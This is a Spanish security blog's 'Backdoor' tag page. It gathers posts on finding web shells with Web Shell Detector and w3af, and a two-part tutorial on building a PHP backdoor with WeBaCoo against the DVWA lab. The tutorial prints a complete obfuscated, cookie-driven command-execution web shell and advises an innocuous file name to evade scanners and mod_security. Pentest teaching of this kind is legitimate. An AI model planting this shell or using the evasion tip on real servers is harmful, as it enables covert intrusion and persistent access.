El día de hoy les quiero comentar de una interesante herramienta que utilizo para buscar los "Web Shells" dentro de un directorio Web donde los malos siempre se quieren colar.
Y para ello vamos a utilizar una herramienta llamada Web Shell Detector donde viene en las versiones escrita en el lenguaje de PHP y Python.
A fines prácticos, realmente me gusta mucho utilizarlo como scripts en Python. Para poder descargarlo solo tenemos que clonar el repositorio desde GitHub de la siguiente manera:
$ git clone https://github.com/emposha/Shell-Detector.git
Solo queda ingresar al directorio y ejecutar la herramienta shelldetector.py especificando como argumento -d el directorio que queremos revisar.
$ python shelldetector.py -d /var/www/miweb
Shell Detector va a investigar y analizar cada archivo dentro de ese directorio web en búsqueda de funciones que generalmente los malos utilizan para ocultar y ofuscar scripts como base64_encode, system, exec, etc. y por medio de su firma, expresiones regulares y contenido puede llegar a determinar si se trata de un Web Shell instalado en el servidor.
Recordemos que los Web Shell más populares encontrados en las webs coladas son c99, r57, c100, PHPjackal y Locus, pero claro no son los únicos.
A poner en práctica esta herramienta y monitorear nuestros servidores web con esta herramienta tan simple de implementar.
Saludos!
Enlace | Web Shell Detector
Mostrando las entradas con la etiqueta Backdoor. Mostrar todas las entradas
Mostrando las entradas con la etiqueta Backdoor. Mostrar todas las entradas
5 de marzo de 2016
27 de febrero de 2014
Como buscar backdoors con w3af
La idea de hoy es entender y utilizar w3af como herramienta para buscar en un sitio web un backdoors, en muchos casos también se conoce como webshell y que generalmente un atacante instala para luego seguir ingresando al servidor comprometido.
Para comenzar a auditar cualquier web, debemos iniciar w3af de la siguiente manera
$ ./w3af_console
Una vez allí, escogemos un perfil para comenzar a escanear, para el ejemplo vamos a usar empty_profile
w3af>>> profiles use empty_profile
Ahora necesitamos activar uno de los plugins con los que cuenta w3af, dentro de la categoría de crawl llamado find_backdoors, el mismo posee una pequela wordlist con los nombres de los backdoors más populares como c99, r57, cmd, etc.
w3af>>> plugins crawl find_backdoors
Ahora nos queda setear la dirección web a la cuál se va a realizar las pruebas y búsqueda de backdoors
w3af>>> target set target http://misitioweb.com
Finalmente iniciamos el scanner y solo nos queda esperar los resultados del test. W3af lo que va a hacer es probar estos nombres de archivo anidada a la dirección web ingresada esperando un requests 200 con la cuál va a confirmar la existencia de un backdoor.
w3af>>> start
Saludos!
Etiquetas:
Auditoría
,
Backdoor
,
Herramientas
,
Web
17 de diciembre de 2013
Como crear un Backdoor con WeBaCoo (2 de 2)
Segunda y última parte de esta entrega, y la idea de hoy es en primer lugar crear nuestro backdoor con WeBaCoo y lograr comprometer un servidor, para evitar meternos en problemas vamos a utilizar DVWA y en particular su fallo en el menu de Upload.
Para evitar llamar la atención en los escaneadores de archivos e incluso en el mismo mod_security, les recomiendo que utilicen un nombre para su backdoor que no haga alusión a que es un backdoor sino un archivo más.
$ ./webacoo.pl -g -f 1 -o consulta.php
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
Copyright (C) 2011-2012 Anestis Bechtsoudis
{ @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }
[+] Backdoor file "consulta.php" created.
Por defecto el código queda ofuscado, pero tenemos la opción con -r de no ofuscarlo al momento de generarlo.
$ cat consulta.php
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>
Etiquetas:
Backdoor
,
Pentesting
,
PHP
25 de noviembre de 2013
Como crear un Backdoor con WeBaCoo (1 de 2)
La idea de estos artículos es entender algunos conceptos y rápidamente ponerlos en práctica, haciendo uso de algunas herramientas para plantar nuestra bandera en las auditorios y pentesting que realicemos, en otras palabras es una buena forma de consolidar nuestro acceso y tomar control del servidor.
Antes les propongo conocer un poco más sobre los Backdoors, Wikipedia nos propone el siguiente concepto:
"En la informática, una puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema. Aunque estas puertas pueden ser utilizadas para fines maliciosos y espionaje no siempre son un error, pueden haber sido diseñadas con la intención de tener una entrada secreta."
Ahora bien, conociendo este concepto y dada una cantidad de factores a nuestro favor, nosotros podríamos llegar a crear un backdoor para tener acceso en todo momento.
UN DATO CURIOSO
En el 90% de los defacement en sitios webs, sus atacantes dejan una puerta trasera creadas con algún scripts PHP Shell como c99Shell, r57shell o alguno similar, detectable por algun analizador de Log en el Servidor Web y subida al servidor por algún fallo en los permisos de un directorio, Remot File Include o una mala administración de las cuentas de usuarios administradores del sitio.
Desde hace tiempo, utilizo una herramienta para crear Backdoor en PHP llamada WeBaCoo.
Etiquetas:
Backdoor
,
GitHub
,
Herramientas
,
Pentesting
,
PHP
Suscribirse a:
Entradas (Atom)
Entradas populares
-
Lamento que te enteres por este medio pero tu pareja te engaña. Hace tiempo estoy saliendo con alguien y me engaño diciendo que no tenia ...
-
El Análisis Forense de computadores y sistemas es una de la rama fascinantes de la seguridad informática que año tras año va tomando más fu...
-
En algún momento hablamos lo simple y práctico que es contactar con reportes reportes web, completos analizadores de Logs que nos permiten m...
-
La idea de este post es dejarle una lista de gente que realmente se dedica a Seguridad Informática y sus temas relacionados, gente apasio...
-
Hoy les quiero compartir un nuevo Webcast parte de la segunda temporada de ElevenPaths Talks . Para esta sesión nos encontramos con Diego Es...
-
Luego de un par de semanas de programacion y algunos commits en los repositorios de GitHub , les quería anunciar la version 1.0 de WPHarde...
-
Esto es parte de las nuevas tecnologías con la que hoy contamos. Solo basta con leer un par de líneas para saber de que estas ideas son las ...
-
Figura 1: 4 consejos para proteger SSH en RouterOS Hace algunos días publiqué un Dork en Google y en Shodan donde nos permite encontra...
-
Excelente investigación por parte de Sheila Berta ( @UnaPibaGeek ) sobre un mecanismo de vulnerar un Android y que dió nombre a su confere...
-
No quería dejar pasar esta oportunidad para celebrar junto a todos los lectores de este, mi pequeño espacio donde me gusta hablar ( escribir...